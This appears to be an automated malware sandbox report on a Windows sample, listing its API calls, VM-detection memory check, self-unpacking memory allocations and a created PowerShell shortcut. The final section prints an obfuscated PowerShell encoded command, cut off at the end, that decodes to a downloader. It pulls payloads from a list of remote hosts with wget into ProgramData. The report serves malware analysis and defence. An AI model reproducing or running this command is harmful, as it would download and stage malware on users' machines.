CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eba40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eba40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 23, 2023, 9:37 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 136 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 851968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02650000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02651000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02652000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0254a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0255b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02557000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02542000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02555000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0254c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02880000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0255c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02543000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02544000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02545000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02546000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02547000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02548000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02549000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f13000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f14000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f15000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f16000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f17000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f18000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f19000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 23, 2023, 9:37 a.m.	process_identifier: 2264 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABjAGEAcABzAGkAYwB1AG0AcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQAYwBBAE8AUQBBAHUAQQBEAEkAQQBNAGcAQQAzAEEAQQA9AD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAGcAQQAzAEEAQwA0AEEATgB3AEEAegBBAEMANABBAE4AdwBBAHcAQQBDADQAQQBPAEEAQQAwAEEAQQA9AD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAEkAQQBMAGcAQQB5AEEARABFAEEATgBnAEEAdQBBAEQARQBBAE4AQQBBADEAQQBDADQAQQBNAFEAQQA1AEEARABjAEEAIgA7ACQAVAB1AGIAZgBpAHMAaABlAHMAUwBsAHUAbQBwAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAYwBBAGMAZwBCAGgAQQBHADQAQQBkAFEAQgBzAEEARwA4AEEAWQB3AEIANQBBAEgAUQBBAGIAdwBCAHcAQQBHADgAQQBhAFEAQgBsAEEASABNAEEAYQBRAEIAegBBAEMANABBAFoAUQBCAHUAQQBIAFEAQQBaAFEAQgB5AEEASABBAEEAYwBnAEIAcABBAEgATQBBAFoAUQBCAHoAQQBBAD0APQBGAE8AdwBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYASQBBAFoAUQBCAHAAQQBHADQAQQBkAEEAQgBsAEEASABJAEEAWgBnAEIAbABBAEgASQBBAFoAUQBCAHUAQQBHAE0AQQBaAFEAQgBRAEEASABJAEEAYgB3AEIAdwBBAEcAOABBAFoAQQBCAHAAQQBHAEUAQQBiAEEAQgBsAEEAQwA0AEEAWgBBAEIAbABBAEEAPQA9ACIAOwAkAEwAbwB3AGIAcgBlAGQARAB5AHMAawBpAG4AZQBzAGkAYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAUQBBAGMAZwBCAHYAQQBHAHcAQQBiAEEAQgBsAEEASABrAEEAWQBnAEIAMQBBAEgATQBBAEwAZwBCAGoAQQBHAEUAQQBjAHcAQgBvAEEAQQA9AD0ATgBvAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AZwBBAHcAQQBEAFUAQQBMAGcAQQA1AEEARABNAEEATABnAEEAeABBAEQAQQBBAE8AUQBBAD0ATgBvAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABRAEEATQB3AEEAdQBBAEQARQBBAE8AQQBBADUAQQBDADQAQQBOAEEAQQA1AEEAQwA0AEEATQBnAEEAegBBAEQASQBBAE4AbwBMAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAbwBBAGIAdwBCADUAQQBIAGMAQQBaAFEAQgBsAEEARwBRAEEATABnAEIAMABBAEcAOABBAGQAdwBCAHUAQQBBAD0APQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAyADsAJABVAG4AdABhAHgAaQBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAE0AQQBHAGsAQQBiAGcAQgBuAEEARwBFAEEAYgBBAEIAaABBAEMANABBAGQAZwBCAGoAQQBBAD0APQBZAGwAcQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMgBBAEMANABBAE8AQQBBADUAQQBDADQAQQBNAFEAQQB3AEEARABJAEEAWQBsAHEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBFAEEAYgBBAEIAdgBBAEcATQBBAFkAUQBCAHMAQQBHAE0AQQBZAFEAQgB1AEEARwBVAEEAWQBRAEIAdQBBAEMANABBAGQAZwBCAHYAQQBIAGsAQQBZAFEAQgBuAEEARwBVAEEAWQBsAHEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBBAEEAMABBAEMANABBAE0AZwBBAHcAQQBEAEUAQQBMAGcAQQAyAEEARABZAEEATABnAEEAMgBBAEQASQBBACIAOwAkAFAAcgBpAG0AaQB0AGkAYQBlAFMAYwByAHUAdABvACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE0AZwBBAHYAQQBIAE0AQQBNAEEAQgBCAEEAQwA4AEEATgBnAEEAMgBBAEQAUQBBAGIAdwBBADIAQQBIAEUAQQBkAGcAQgBqAEEARwBVAEEAYQBnAEEAPQBTAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAE8AUQBBAHUAQQBEAEUAQQBOAHcAQQB5AEEAQwA0AEEATgBBAEEAMQBBAEMANABBAE4AdwBBADUAQQBDADgAQQBVAEEAQgBzAEEARQB3AEEATgBBAEIAdABBAEYAVQBBAEwAdwBCAHAAQQBIAEUAQQBSAHcAQgBNAEEARABjAEEAUwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATQBnAEEAMABBAEMANABBAE0AUQBBADUAQQBEAGcAQQBMAGcAQQB5AEEARABFAEEATQB3AEEAdgBBAEUAWQBBAGMAdwBBADQAQQBGAEEAQQBlAFEAQQB2AEEARwB3AEEAVQBBAEIASwBBAEcAbwBBAFIAZwBBADMAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABTAGwAYQB2AG8AYwByAGEAdABpAGMAQwBvAG4AZgBlAHMAcwBlAHMAIABpAG4AIAAkAFAAcgBpAG0AaQB0AGkAYQBlAFMAYwByAHUAdABvACAALQBzAHAAbABpAHQAIAAiAFMAIgApACAAewAkAEYAbAB1AHMAaABpAG4AZwBsAHkARQBwAGkAegBvAGEAcgBpAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIASABBAEcAOABBAFoAQQBCAG0AQQBIAFUAQQBiAEEAQgBFAEEARwBVAEEAYwBBAEIAbABBAEcANABBAFoAQQBCAGgAQQBHADQAQQBkAEEAQgBzAEEASABrAEEATABnAEIAegBBAEcAZwBBAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATQBnAEEAdQBBAEQAawBBAE8AUQBBAHUAQQBEAEUAQQBOAHcAQQB5AEEAQwA0AEEATQBRAEEAdwBBAEQAUQBBAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwA4AEEAWQBnAEIAcwBBAEcAawBBAGQAQQBCAGwAQQBIAEkAQQBZAFEAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEgATQBBAFYAUQBCADIAQQBHAEUAQQBjAGcAQgB2AEEASABZAEEAYQBRAEIAMABBAEcAVQBBAEwAZwBCAGoAQQBIAEkAQQBaAFEAQgBrAEEARwBrAEEAZABBAEIAagBBAEcARQBBAGMAZwBCAGsAQQBBAD0APQAiADsAdAByAHkAIAB7ACQATABvAG8AZgBhAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBNAFEAQQB1AEEARABFAEEATQBBAEEAMwBBAEMANABBAE0AUQBBADMAQQBEAGMAQQBMAGcAQQAxAEEARABNAEEAVgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFUAQQBiAGcAQgBrAEEARwBVAEEAYwBnAEIAegBBAEgAQQBBAGIAQQBCAHAAQQBHAE0AQQBhAFEAQgB1AEEARwBjAEEATABnAEIAegBBAEcARQBBAFYAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABBAEEATABnAEEAMABBAEQAUQBBAEwAZwBBAHgAQQBEAGsAQQBOAFEAQQB1AEEARABFAEEATQBRAEEAMgBBAEEAPQA9AFYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBFAEEAYgBBAEIAcwBBAEcAOABBAGQAQQBCAHkAQQBHADgAQQBjAEEAQgBsAEEASABNAEEATABnAEIAbABBAEcAMABBAFkAUQBCAHAAQQBHAHcAQQAiADsAJABLAGUAZQBuAGkAbgBnAFQAaABlAG8AcABoAGEAZwB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBFAEEARwBFAEEAYgBBAEIAagBBAEcARQBBAGMAdwBCAHoAQQBHAGsAQQBZAFEAQgB1AEEARgBVAEEAYgBnAEIAegBBAEcAVQBBAGIAZwBCAHoAQQBHAGsAQQBZAGcAQgBwAEEARwB3AEEAYQBRAEIAMABBAEgAawBBAEwAZwBCAHoAQQBHAFUAQQBlAEEAQgA1AEEAQQA9AD0ASQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAFEAQQBhAFEAQgAyAEEARwBVAEEAYwBnAEIAbgBBAEcAVQBBAGIAZwBCAGoAQQBHAFUAQQBjAHcAQgBCAEEARwB3AEEAWQBRAEIAeQBBAEcAMABBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEASABjAEEAWgBRAEIAaQBBAEgATQBBAGEAUQBCADAAQQBHAFUAQQBJAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGEAQQBCAHYAQQBIAFEAQQBiAHcAQgB1AEEARwBVAEEAWgB3AEIAaABBAEgAUQBBAGEAUQBCADIAQQBHAFUAQQBMAGcAQgB6AEEARwA4AEEAYgBBAEIAaABBAEgASQBBAEkAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBpAEEARwBFAEEAYgBBAEIAaABBAEcANABBAGIAdwBCAHcAQQBHAGcAQQBiAHcAQgB5AEEARwBrAEEAYgBnAEEAdQBBAEgAYwBBAGEAUQBCAHIAQQBHAGsAQQAiADsAJABvAHUAdABjAG8AbQBlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFMAbABhAHYAbwBjAHIAYQB0AGkAYwBDAG8AbgBmAGUAcwBzAGUAcwApACkAOwB3AGcAZQB0ACAAJABvAHUAdABjAG8AbQBlACAALQBPACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGEAZQBjAGkAZABpAHUAbQAuAEEAdAB0AGUAbgB1AGEAdABvAHIAOwAkAGYAaQBnAGUAYQB0AGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AdwBBAHUAQQBEAGcAQQBOAFEAQQB1AEEARABFAEEATwBBAEEAMgBBAEMANABBAE0AUQBBAHgAQQBEAEkAQQAiADsAJABWAGUAcgBuAGEAbABpAHQAeQBNAGkAYwByAG8AcABoAG8AbgBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEEAQQBNAEEAQQB1AEEARABFAEEATwBRAEEAeQBBAEMANABBAE0AUQBBADUAQQBEAFEAQQBMAGcAQQAyAEEARABBAEEAbwBaAFQAawBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAHcAQQBZAFEAQgB3AEEARwBJAEEAYgB3AEIAaABBAEgASQBBAFoAQQBCAEUAQQBHADgAQQBkAHcAQgB1AEEARwBZAEEAWQBRAEIAagBBAEcAVQBBAEwAZwBCAHoAQQBHAFUAQQBvAFoAVABrAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEA